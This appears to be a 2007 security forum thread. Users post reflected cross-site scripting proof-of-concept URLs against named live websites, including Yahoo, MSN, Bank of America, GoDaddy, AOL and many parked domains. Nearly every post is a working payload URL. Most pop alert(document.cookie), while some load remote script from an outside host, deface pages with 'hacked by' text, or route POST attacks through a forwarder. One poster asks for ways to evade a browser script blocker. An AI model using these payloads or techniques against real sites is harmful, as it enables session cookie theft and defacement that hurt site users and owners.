I probably should've made that clearer... I've edited the post as such

-tx @ lowtech-labs.org

Yahoo once again: http://siteexplorer.search.yahoo.com/search?p=http%3A%2F%2Fgoogle.com%22style%3D%22-moz-binding%2F**%2F%3Aurl%28http%3A%2F%2Fha.ckers.org%2Fxssmoz.xml%23xss%29&bwm=i

Salon:
http://www.salon.com/news/cookie756.html?URL=/%22%7D%0A%61%6C%65%72%74%28%64%6F%63%75%6D%65%6E%74%2E%63%6F%6F%6B%69%65%29%0A%7B%2F%2F
http://search.salon.com/salonsearch.php?search=%00%3Cscript%3Ealert('xss');%3C/script%3E&breadth=salon

EDIT: Added another one from http://astrocenter.astrology.msn.com . Note: This is different than the one thomaspollet posted last October http://sla.ckers.org/forum/read.php?3,44,1458#msg-1458 (which still hasn't been fixed, btw) , mainly in that it's POST as opposed to GET, and in that msn is nice enough to store the variable as a cookie (PreProfil) that expires in 2017 so it persists after the user has closed their browser.
http://www.whiteacid.org/misc/xss_post_forwarder.php?xss_target=http://astrocenter.astrology.msn.com/msn/DeptHoroscope.aspx?AutomateState=&URLAfterSuccededSubmit=http%3A%2F%2Fastrocenter.astrology.msn.com%2Fmsn%2FMyToday.aspx%3FAf%3D-1000&FirstName=%22%3Balert(document.cookie)%3B%2F%2F&GenderSelector=1&MonthSelector=1&DaySelector=2&YearSelector=1942&Submit=Go

-tx @ lowtech-labs.org



Edited 6 time(s). Last edit at 03/10/2007 09:20PM by tx.

All those parked domains, they must be good for something...

http://vonea.com/index.php?sx=%22%3E%3Cscript%3Ealert%28String.fromCharCode%2888%2C83%2C83%29%29%3C%2Fscript%3E
http://admedia.com/index.php?sx=%22%3E%3Cscript%3Ealert%28String.fromCharCode%2888%2C83%2C83%29%29%3C%2Fscript%3E
http://ampea.com/index.php?sx=%22%3E%3Cscript%3Ealert%28String.fromCharCode%2888%2C83%2C83%29%29%3C%2Fscript%3E
http://wexea.com/index.php?sx=%22%3E%3Cscript%3Ealert%28String.fromCharCode%2888%2C83%2C83%29%29%3C%2Fscript%3E
http://hangovercombat.com/index.php?sx=%22%3E%3Cscript%3Ealert%28String.fromCharCode%2888%2C83%2C83%29%29%3C%2Fscript%3E
http://www.magnamedia.us/index.php?sx=%22%3E%3Cscript%3Ealert%28String.fromCharCode%2888%2C83%2C83%29%29%3C%2Fscript%3E
http://affiliate-viral-marketing.com/index.php?sx=%22%3E%3Cscript%3Ealert%28String.fromCharCode%2888%2C83%2C83%29%29%3C%2Fscript%3E
http://forea.com/index.php?sx=%22%3E%3Cscript%3Ealert%28String.fromCharCode%2888%2C83%2C83%29%29%3C%2Fscript%3E
http://cyberdyaryo.com/index.php?sx=%22%3E%3Cscript%3Ealert%28String.fromCharCode%2888%2C83%2C83%29%29%3C%2Fscript%3E
http://lifetodigital.com/index.php?sx=%22%3E%3Cscript%3Ealert%28String.fromCharCode%2888%2C83%2C83%29%29%3C%2Fscript%3E
http://kent2do.com/index.php?sx=%22%3E%3Cscript%3Ealert%28String.fromCharCode%2888%2C83%2C83%29%29%3C%2Fscript%3E
http://badfood.org/index.php?sx=%22%3E%3Cscript%3Ealert%28String.fromCharCode%2888%2C83%2C83%29%29%3C%2Fscript%3E
http://eurobytes.com/index.php?sx=%22%3E%3Cscript%3Ealert%28String.fromCharCode%2888%2C83%2C83%29%29%3C%2Fscript%3E

Several hundred more of those: http://www.google.com/search?q=%22To+inquire+about+this+domain%22+%22Related+searches%22

http://logisticsolutions1980.com/ct.html?u=http://google.com/%22%20style=%22-moz-binding:url(http://ha.ckers.org/xssmoz.xml%23xss)&e=1
http://tucsons1stoprealtors.com/ct.html?u=http://google.com/%22%20style=%22-moz-binding:url(http://ha.ckers.org/xssmoz.xml%23xss)&e=1
http://www.buybritneyshair.com/ct.html?u=http://google.com/%22%20style=%22-moz-binding:url(http://ha.ckers.org/xssmoz.xml%23xss)&e=1
http://jybe.com/ct.html?u=http://google.com/%22%20style=%22-moz-binding:url(http://ha.ckers.org/xssmoz.xml%23xss)&e=1
http://pansoftware.com/ct.html?u=http://google.com/%22%20style=%22-moz-binding:url(http://ha.ckers.org/xssmoz.xml%23xss)&e=1

A million more of those: https://www.tdnam.com/

http://www.chestertonholdings.com/inquire.php?inquiry_domain=%22%3E%3Cscript%3Ealert(1)%3C/script%3E
http://www.inquireaboutthisdomain.com/?domainname=%22%3E%3Cscript%3Ealert(1)%3C/script%3E
http://www.sedo.com/search/searchresult.php4?keyword=%22%3E%3Cscript%3Ealert%28%22xss%22%29%3C%2Fscript%3E
http://washingtondcdental.com/%22%3E%3Cscript%3Ealert%28%22xss%22%29%3C/script%3E.cfm?t=5
http://www.whiteacid.org/misc/xss_post_forwarder.php?xss_target=http://hus.parkingspa.com/handcrafted2.asp&search_text=%22%22%3E%3Cscript%3Ealert(%22xss%22)%3C/script%3E&search_source=60 [hus.parkingspa.com]
http://www.whiteacid.org/misc/xss_post_forwarder.php?xss_target=http://www.industrydomains.com/&email=%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E [industrydomains.com]



Edited 3 time(s). Last edit at 03/10/2007 10:44PM by trev.

*yawn* I'm drunk and tired...

but not too drunk for this: http://www.macfixitforums.com/postlist.php?Cat=&Board=Forum35%22%3E%3C%2F%73%63%72%69%70%74%3E%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%27%78%73%73%27%29%3B%2F%2F heh, macs...

EDIT: https://onlineeast2.bankofamerica.com/cgi-bin/ias/0/E/EnrollEntryPoint?stateCode=AL%22;alert('xss');//
g'nite interwebs

-tx @ lowtech-labs.org



Edited 1 time(s). Last edit at 03/11/2007 06:43AM by tx.

Yay macs!

- RSnake
Gotta love it. http://ha.ckers.org

Requires user interaction:

[groups.google.com]

Click "More options" twice.

[www.dreamincode.net]

http://qdb.hacktthissite.org/home.php?q=%22%3E%3Cscript+src%3Dhttp%3A%2F%2Fha.ckers.org%2Fs.js%3E%3C%2Fscript%3E

----------
'Just because you got the bacon, lettuce, and tomato don't mean I'm gonna give you my toast.'

haha, nice!

- RSnake
Gotta love it. http://ha.ckers.org

http://www.blackeyedpeas.com/home/news/?searchTerms=%22%3E%3Cp%3EXSS+HACKED+BY+FR3DC3RV%3Cp%3E&submit=++Search++&categoryID=0&startDateMonth=3&startDateDay=3&startDateYear=2002&userLogin=&endDateMonth=3&endDateDay=13&endDateYear=2007&resultsPerPage=30&orderField=2&order=2

Search "><script>alert(document.cookie)</script>:
http://farejador.ig.com.br/busca.do
or
http://www.emf.no-ip.com/portal/search.html
or
http://www.u2.com/login.php

http://www.u2.com/search/index.php?keyword=%22%3E%3Cp%3E%3Cb%3EHOW+TO+DISMANTLE+AN+U2+WEBSITE%3F%3C%2Fp%3E%3Cp%3EHACKED+BY+FR3DC3RV%3C%2Fp%3E%3C%2Fb%3E&match=all&s_table=news&submit=1

-------------------------------
http://fr3dc3rv.blogspot.com



Edited 1 time(s). Last edit at 03/13/2007 04:54PM by FR3DC3RV.

http://add.yahoo.com/fast/help/us/widgets/cgi_feedback?email=%22style%3D%22-moz-binding%3Aurl%28http%3A%2F%2Fha.ckers.org%2Fxssmoz.xml%23xss%29%22

More Godaddy:
https://email.secureserver.net/login.php?domain=sla.ckers.org%22%3E%3Cscript%3Ealert(document.cookie);%3C/script%3E%3Cp%20id=%22
https://idp.securepaynet.net/login.aspx?prog_id=xss&spkey=SPSWB116&login=&target=secure_transfer.asp&myaurl=&'onmouseover='alert(document.cookie%29 Mouseover 'Home' or the promotional links near the bottom of the page
https://idp.godaddy.com/shopper_new.aspx?pathway=01280d32-4185-4a35-aa98-022667f3a443&SPKey=GDDNAEB03&myaurl=&'onmouseover='alert(document.cookie%29 Mousover any link in the form

-tx @ lowtech-labs.org



Edited 2 time(s). Last edit at 03/14/2007 07:30PM by tx.

http://support.alcohol-soft.com/en/knowledgebase.php?postid=25209&title=%3Cscript%3Ealert(1)%3C/script%3E

- Kyran

[[url=http://www.mtv.com/sitewide/utils/gamespot/gs_scripts.jhtml?gamespotURL=%22%3E%3Ctitle%3EMTV.com%20-%20XSS%20PoC%20-%20daltd%3C%3C//title%3E%3Cscript%3Ealert('XSS');%3C/script%3E]www.mtv.com[/url]]
[[url=http://sony.mtv.com/sony_moviemixer.php?src=sony_moviemixer.phpx&door=%22%3E%3Cscript%3Ealert(String.fromCharCode(88,83,83));%3C/script%3E]sony.mtv.com[/url]]
[[url=http://videogames1.mtv.com/pages/gamespace/story.php?pid=%22%3E%3Cscript%3Ealert(String.fromCharCode(88,83,83));%3C/script%3E&id=6121675&page=9]videogames1.mtv.com[/url]]



Edited 1 time(s). Last edit at 03/18/2007 05:45AM by daltd.

[http://www.flashback.info/leave.php?google.com/"/onclick="alert('xss')] - for Internet Explorer, click "gå videre"

http://www.authpro.com/cgi-bin/auth.fcgi?user=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

http://research.microsoft.com/adapt/MSBNx/MSBNxManual.asp?path=x%22+onload=%22alert(/xss/);//



Edited 2 time(s). Last edit at 03/19/2007 02:54PM by beford.

Take this college board!

http://apps.collegeboard.com/search/quicksearch.jsp?formState=1&word=%22%3E%3Cscript%3Ealert(1);%3C/script%3E

You and your SATs. >:(

http://www.whiteacid.org/misc/xss_post_forwarder.php?

add this after xss_post_forwarder.php?
xss_target=http://faq.gmx.de/search/q.php&top=';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>=&{}&query=';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>=&{}



Edited 1 time(s). Last edit at 03/19/2007 03:54PM by christ1an.

Wow still busy with these finds? ^^ you diehards! :)

hxxps://broadband.msn.com/account/index.asp?email=email@ya.com%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

I have not tested this one, however it should work on IE
hxxps://broadband.msn.com/account/rebate_center.asp?email=lolzor@gmail.com%22+style=%22background-image:%20url(javascript:alert('XSS'))

Yes, the second one works in IE - but only if you click "ok" on the warning (the web page uses SSL and this image is supposedly not transfered via SSL).



Edited 1 time(s). Last edit at 03/22/2007 07:28AM by trev.

I tried the 2nd one in IE7. It's not working...

http://www.snapfiles.com/downloadfind.php?st='';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>=&{}

http://www.javabrewingco.com/search_results.asp?txtsearchParamType=';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//%22;alert(String.fromCharCode(88,83,83))//\%22;alert(String.fromCharCode(88,83,83))//--%3E%3C/SCRIPT%3E%22%3E'%3E%3CSCRIPT%3Ealert(String.fromCharCode(88,83,83))%3C/SCRIPT%3E=&{}



Edited 2 time(s). Last edit at 03/22/2007 08:28PM by epsteinbar.

I'm really interested in knowing if any of these POCs, possibly combined with any of the known launch techniques, could work as a reflected XSS from an untrusted origin to a whitelisted website, meant to evade the NoScript block (against the latest anti-XSS development version).

All those I've tried so far do fail, but again I'm all ears for effective evasion approaches (other than social engineering).

Many thanks!

--
*hackademix.net*

There's a browser safer than Firefox... Firefox, with NoScript

nice place for spoofing:
https://my.screenname.aol.com/_cqr/login/login.psp?mcState=initialized&mcState=initializ');alert('XSS');alert('add%20more%20XSS%20here%20%20--%20d&sitedomain=my.screenname.aol.com&authLev=1&siteState=**getOneFree.psp&lang=de&locale=null

There're some more injection places if you look at the returned page.
The strange part is, that you get different results for mozilla and IE, probably due to different handling of javascript errors.

http://www.tiinside.com.br/Pesquisa.asp?Num_Linhas=20&Texto=%22%3E%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E&Onde=Tx
http://www.looksheetmusic.com/search.php?q=%22%3E%3Cscript%3Ealert%28%2FXSS+HACKED+BY+FR3DC3RV%2F%29%3C%2Fscript%3E&submitted=true&orderbyA=&vsmA=1&smpA=1&mnA=1&musicroomA=1&stagepassA=1

Insert "><script>alert(document.cookie)</script> as your email.
https://www.sign-up.to/signup.php?fid=1402&pid=1071

Insert "><script>alert(document.cookie)</script> as your email or " onclick=javascript:alert(document.cookie)// as your nickname:

http://ogame475.de/game/reg/new.php

-------------------------------
http://fr3dc3rv.blogspot.com

The site's glossary feature:
http://www.teenwire.com/glossary/glossary-definition.php?term=<script>alert(String.fromCharCode(34,84,117,114,110,32,111,110,46,32,84,117,110,101,32,105,110,46,32,68,114,111,112,32,111,117,116,46,34));</script>

The site's Planned Parenthood location area:
http://www.teenwire.com/clinics/cl-zip.php?%7ENum-Len-5%7EZip_Code="><script>alert(String.fromCharCode(34,72,101,121,32,104,101,121,32,73,32,119,97,110,116,101,100,32,67,104,105,110,101,115,101,32,116,97,107,101,97,119,97,121,33,32,72,101,121,32,104,101,121,33,32,87,111,111,32,119,111,111,32,119,111,111,33,34));</script>&x=10&y=5

The site's login area.
http://www.teenwire.com/login/
You can inject simple HTML to disrupt the page like XMP via POST request, but I doubt much can be accomplished on this one.


Awesome AnDrEw - That's The Sound Of Your Brain Crackin'
http://www.awesomeandrew.net/

http://www.opendiary.com/searchresults.asp?searchstring=%3Cscript%3Ealert(0)%3C/script%3E